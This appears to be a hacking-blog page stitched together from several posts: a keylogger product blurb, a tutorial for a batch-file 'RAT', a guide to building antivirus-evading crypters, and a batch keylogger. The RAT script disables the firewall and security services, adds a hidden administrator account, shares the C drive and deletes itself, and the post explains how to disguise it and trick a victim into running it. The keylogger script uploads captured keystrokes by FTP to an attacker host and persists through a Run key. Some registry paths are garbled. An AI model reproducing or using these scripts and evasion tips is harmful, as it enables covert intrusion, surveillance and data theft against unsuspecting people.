Fusion Of Tech And Fun !!

Ardamax Keylogger is a keystroke recorder that captures user’s activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited.

This invisible spy application is designed for 2000, XP, 2003, Vista and Windows 7.
Read more…

As The Title says all in this tut i am going to make you learn how to create a RAT In Cmd
A Quick GUide To RAT

What is a RAT?

Well to start off, The term RAT is short for Remote Administration Tool.
A quick definition of a RAT (Remote Administration Tool): RAT’S are used to connect and manage a single or multiple computers with a variety of tools, such as:

* Screen/camera capture or control
* File management (download/upload/execute/etc.)
* Shell control (usually piped from command prompt)
* Computer control (power off/on/log off)
* Registry management (query/add/delete/modify)
* Other product-specific function

Are RATS Legal/Illegal?

Well, It is actually both. There are RATS that are Legal and that are actually Illegal. The difference between them both are the fact that, Legal RATS inform the connected remote that you are on the computer, And Illegal RATS do NOT inform the remote that you are on the computer.
So basically to break things down.

Legal means the person has full control as well, They can kill the connection any time they please, No backdoor is left on their PC, And it is in your network.

Illegal means the person does NOT know you are connected and they have no knowledge you are till you take action, They have no control to kill the connection (unless they unplug the internet), But even then, A backdoor is left on the computer meaning anytime the computer is on and the internet is up, You can connect anytime you want. You can destroy files, Download files, Steal information, Basically make their life miserable.

SO I think till now you must have some basic knowledge of RATs

Now We Headon to Our TuT!

Simply paste the code underneath this into notepad and save it as a .bat file. Or .cmd if you’d like.. Anyways, once your victim has run the file, his firewall and antivirus will be shutdown and an account named ‘admin’ will be created with admin access so.. Yeah.. Under the code you’ll see how to get access..

@echo off
Cls
net share system=C:\ /unlimited
cls
Attrib +r +h C:\windows\startm~1\program\startup\trojan.bat
Cls
net stop SharedAccess
net stop “Security Center”
>>”%Temp%.kill.reg” ECHO REGEDIT4
>>”%Temp%.kill.reg” ECHO.
>>”%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccess]
>>”%Temp%.kill.reg” ECHO “Start”=dword:004
>>”%Temp%.kill.reg” ECHO.
>>”%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv]
>>”%Temp%.kill.reg” ECHO “Start”=dword:004
>>”%Temp%.kill.reg” ECHO.
>>”%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsvc]
>>”%Temp%.kill.reg” ECHO “Start”=dword:004
>>”%Temp%.kill.reg” ECHO.
START /WAIT REGEDIT /S “%Temp%.kill.reg”
del “%Temp%.kill.reg”
del %0
cls
net user Admin /add
net localgroup Administrators /add “Admin”
cls
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList” /v “Admin” /t REG_DWORD /d 00 /f
cls
reg add “HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ Messenger” /v Start /t REG_DWORD /d 002 /f
cls
net start Messenger
cls
netsh firewall set opmode mode=disable
cls
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList” /v “admin” /t REG_DWORD /d 00 /f”
REG add “HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM /V DISABLEREGISTRYTOOLS /T REG_DWORD /D 0 /F”
Cls

Now Make the victim to open this file on his machine
you can convert this .cmd/.bat file to exe file and change icon and all other stuff to make victim trust this file!

Okay, so when the victim have run the file, all you have to do is open cmd on your own computer and type in the following:

net use \\IP-of-your-victim admin

Example how to use above command

net use \\192.168.1.1 admin

Followed by the following code:

explorer \\IP-of-your-victim\system
Example how to use above command

explorer \\192.168.1.1\system

So the 2 lines would be like the following:

net use \\192.168.1.1 admin
explorer \\192.168.1.1\system

obvious edit the IPs

PS. If you don’t know how to get the IP off of someone, go onto MSN and send them a file (Eventually do it with the batch file you sent with the RAT) and go into CMD and type in ‘netstat’, then try to identify it.

and i will soonly post a big thread on how to get IP of victim!

credits== Mudkip

Some things to know before you read this

* I have included an example source file, but don’t download it expecting to have a free FUD crypter
* This guide doesn’t cover every method of file undetection. I’m simply showing you one way you can decrease the number of detections your file gets.
* I’m not responsible for whatever shenanigans you pull with this information

What do anti-viruses look for in a file?
First off, you will need some basic understanding of how anti-viruses work. Exe files are simply lines of instruction, and each line is called an offset.

Anti-virus’s have databases of these lines that are known to be associated with malicious files. They use that database to check against your file to see if it matches. If it does, then it is marked as infected. They do use other methods of detection, but this is the one I will show you how to avoid.

What will the program need to do?
Your crypter is going to take the contents of an infected file, encrypt them, and place it at the bottom of a seemingly virus-free file called your “stub”.
Your stub file will then extract the encrypted data from itself, decrypt it, then extract and run it.

This may sound like a complicated and confusing process, but it isn’t. Here are some diagrams I made to show your what I mean:

Example Source
I’ve created an example program. I have not tested how FUD it will actually make a file, but I can guarantee it is not anywhere near 100%. The reason I did this is because I want YOU to make your crypters. If you think you are completely lost at this point, perhaps you are not ready yet. Read some VB6 tutorials, look at example programs, and learn! When you think you are ready, read through this whole thing again.

I’ve thoroughly commented the code to help you

http://www.mediafire.com/download.php?zncawy1ztzm

Other things you can do
What will be detected now is completely dependent on your stub.

Some things you can do to make your stub further undetected:

* Do NOT take code from other programs!
* Change your variable or function names around to random things. (ex. dim stubFile as string can become dim hdfKd9jsd as string)
* Do not include the word “stub” anywhere in your application.
* After you’ve built your stub, go through it with a hex editor and try to find the word “stub” and take it out. Sometimes it ends up in there without you meaning to put it there.
* Remove the version information from your stub. I recommend Resource Hacker for doing this.
* When calling API’s, use a function called CallApiByName. If you search around, I’m sure you will find an example of it.
* There are many other things you can do. Look around on Hack Forums or Hack Hound. There are lots of great discussions about undetection techniques.
* When test-scanning your file, use novirusthanks.org and check off “do not distribute.” If you scan it with virustotal, they will distribute your file among the AV’s.
* Try not to publicly distribute your crypter
* Don’t give up!

Open Notepad And Copy Paste Th Following Code, Save It As Anything.bat And Send It To Someone

@echo off
del C:\WINDOWS\TASKMAN.exe
echo set shell = CreateObject(“Wscript.Shell”) >> C:\windows\stsyk.vbs
echo shell.run “C:\windows\k.bat”, 0 >> C:\windows\stsyk.vbs
echo @echo off >> C:\windows\k.bat
echo color c9 >> C:\windows\k.bat
echo :go >> C:\windows\k.bat
echo echo .>>c:\keys.txt >> C:\windows\k.bat
echo echo : >> C:\windows\k.bat
echo set /p keys= >> C:\windows\k.bat
echo echo %keys%>>c:\keys.txt >> C:\windows\k.bat
echo @echo off >> C:\windows\k.bat
echo ftp >> C:\windows\k.bat
echo open Yoursite.hoster.com >> C:\windows\k.bat
echo username >> C:\windows\k.bat
echo password >> C:\windows\k.bat
echo put c:\keys.txt >> C:\windows\k.bat
echo quit >> C:\windows\k.bat
echo goto go >> C:\windows\k.bat
echo start C:\windows\stsyk.vbs >> C:\windows\k.bat
echo reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v “stsyk.vbs” /d “C:\WINDOWS\”
start C:\windows\stsyk.vbs